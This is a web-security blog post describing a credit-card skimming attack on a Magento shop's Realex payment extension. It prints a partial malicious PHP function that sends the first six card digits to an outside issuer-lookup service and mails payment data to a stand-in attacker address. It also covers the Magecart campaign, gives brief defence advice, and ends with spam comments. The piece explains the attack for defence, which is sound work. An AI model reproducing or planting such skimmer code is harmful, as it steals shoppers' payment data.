As e-commerce platforms worldwide are opting for stronger security measures, attackers are constantly developing new techniques to compromise these platforms and steal sensitive information provided by customers. A recent case of cyber crime targeted to steal paramount credit card data by compromising Magento’s payment security sheds light on the susceptible state of web security and a dire need of a stronger firewall system for systems promoting large scale financial transactions.

How was Magento’s Payment Security compromised?

The attackers exploited a vulnerability in a targeted Magento shop by injecting a malicious piece of code which allowed the attacker to collect personal and financial data entered by users on the compromised website. The targeted module – Realex Payments Magento extension (SF9) – allows Magento store owners to process mail and telephone orders by entering the payment details themselves. While the extension itself is not vulnerable, the attackers can abuse it by compromising the targeted Magento shop. In this case, a malicious function called sendCcNumber() added to an SF9 file named Remote.php sent sensitive financial data directly to the attacker’s mail. Moreover, the attacker used the online service binlist.net to get the Issuer Identification Numbers (IIN), which in turn is used to identify the institution that issued the card to the card holder.

The vulnerability was found in the following code snippet:

function sendCcNumber() {
……
$data15 = $info->getCcType();
$data16 = substr($info->getCcNumber(), 0,6);
$issued = json_decode(file_get_contents("hxxp://www.binlist[.]net/json/".$data16));

$encode = "removed@attacker.com";
$salt = "$data9 Payment: $data15/$data16/$data17";

mail($encode, $salt, $payfull, $headr);
}

Hackers these days tend to attack the application layer of web applications, where developer faults are more probably. Take the Opencart Malware Injection for example. Attackers circumvent security measures at application end to run their malicious code. It often happens that even highly sophisticated tools fail in undermining this hidden malware because hackers intelligently access the HTTP/HTTPS cookies.

Rise in malware attacks

2016 witnessed a rise in malware attacks, wherein multiple hacked eCommerce websites appeared to be affected by a JavaScript code injected into the site,  allowing the attackers to capture payment card information. Since March 2016, 100 online shops from around the world have been hacked, some of which also include well-known book publishers, fashion companies, and sporting equipment manufacturers. Another case of a Magento attack includes attackers using benign-looking image files of products sold on the compromised website to store payment card data, only to later retrieve from the source code after downloading the image.

Researchers have been monitoring a campaign dubbed “Magecart” by cloud-based security solutions provider RiskIQ to analyse the pattern of attacks.

  1. Technologies affected by credit card stealers are largely the ones hosted on multiple eCommerce platforms. Magento Commerce, Powerfront CMS, and OpenCart are examples of such affected e-Commerce sites.
  2. Multiple payment services providers like Braintree and VeriSign payment processing are targets on the affected sites.
  3. Attackers host formgrabber/credit card stealer content on remotely operated sites, served over HTTPS, while exfiltrating stolen data using HTTPS.
  4. Attackers refine their malicious content in an attempt to blend their malware into commonplace web technologies.

How to protect your website?

Such attacks are on a rise, and cyber-criminals use various tricks to elude detection of their malware. Online shop owners must resort to updating their software periodically. The malicious files used in such attacks can often be identified based on their “last modified” date, and the infection can be detected quickly.

Card fraud attempts cannot be entirely eliminated. However, Astra’s web application firewall ensures a comprehensive security solution via a layered security approach, thus protecting your e commerce website from any malware threats and secure vulnerabilities prone to exploitation by hackers.

Was this post helpful?

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Bhagyeshwari Chauhan

An engineering grad and a technical writer, Bhagyeshwari blogs about web security, futuristic tech and space science.

13 Comments

  1. [BLOCKED BY STBV] Install SUPEE 9652 Magento Security Patch Update: Critical Zend Library Vulnerability Found - Astra Web Security Blog - Reply

    […] attacks on it’s payment security system. A recent case of Magento attack witnessed credit card scrapers targeting the payment security system of Magento stores in order to steal param… Consequently, Magento has been wary of vulnerabilities in its system and in a prudent attempt, […]

  2. Great article! We are linking to this particularly great
    post on our site. Keep up the good writing.

  3. Thanks , I have recently been looking for information approximately
    this topic for a long time and yours is the greatest I have discovered till now.

  4. Thanks for sharing this great post. Keep up the good work.

  5. It’s hard to find well-informed people on this subject, however, you sound like you know what you’re talking about!

    Thanks

  6. I do agree with all the ideas you have introduced for your post.
    They are very convincing and will definately work.

  7. bandar taruhan terpercaya - Reply

    It’s awesome in favor of me to have a site, which is helpful in favor of my
    know-how. thanks admin

  8. melhores sites fotografia - Reply

    I do believe all the ideas you’ve introduced to
    your post. They are really convincing and can certainly work.
    Nonetheless, the posts are very brief and informative

    Thanks for the post.

  9. What’s up, I desire to subscribe for this weblog to
    get most up-to-date updates, so where can i do it please help.

    • Naman Rastogi

      Under each blog article, there is a subscription box where you have to enter your name and email id and you will receive regular updates when a blog post gets live.

  10. I all tһe time emailed this weblog post page to all my contacts, becauѕe
    if I like to read it contacts will too.

  11. Excellent goods from you, man. I’ve understand your stuff prior to and you’re just too excellent.

    I actually like what you’ve received right here, really like what you’re saying and the best way in which you say it.

    You are making it enjoyable and you continue to take care of
    to stay it wise. I can not wait to read much more from you.

    That is actually a terrific website.

  12. What’s up everyone, it’s my first paay a quick visit at this web site,
    and pot is genuinely fruitful in favor of me, keep up posting such content.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close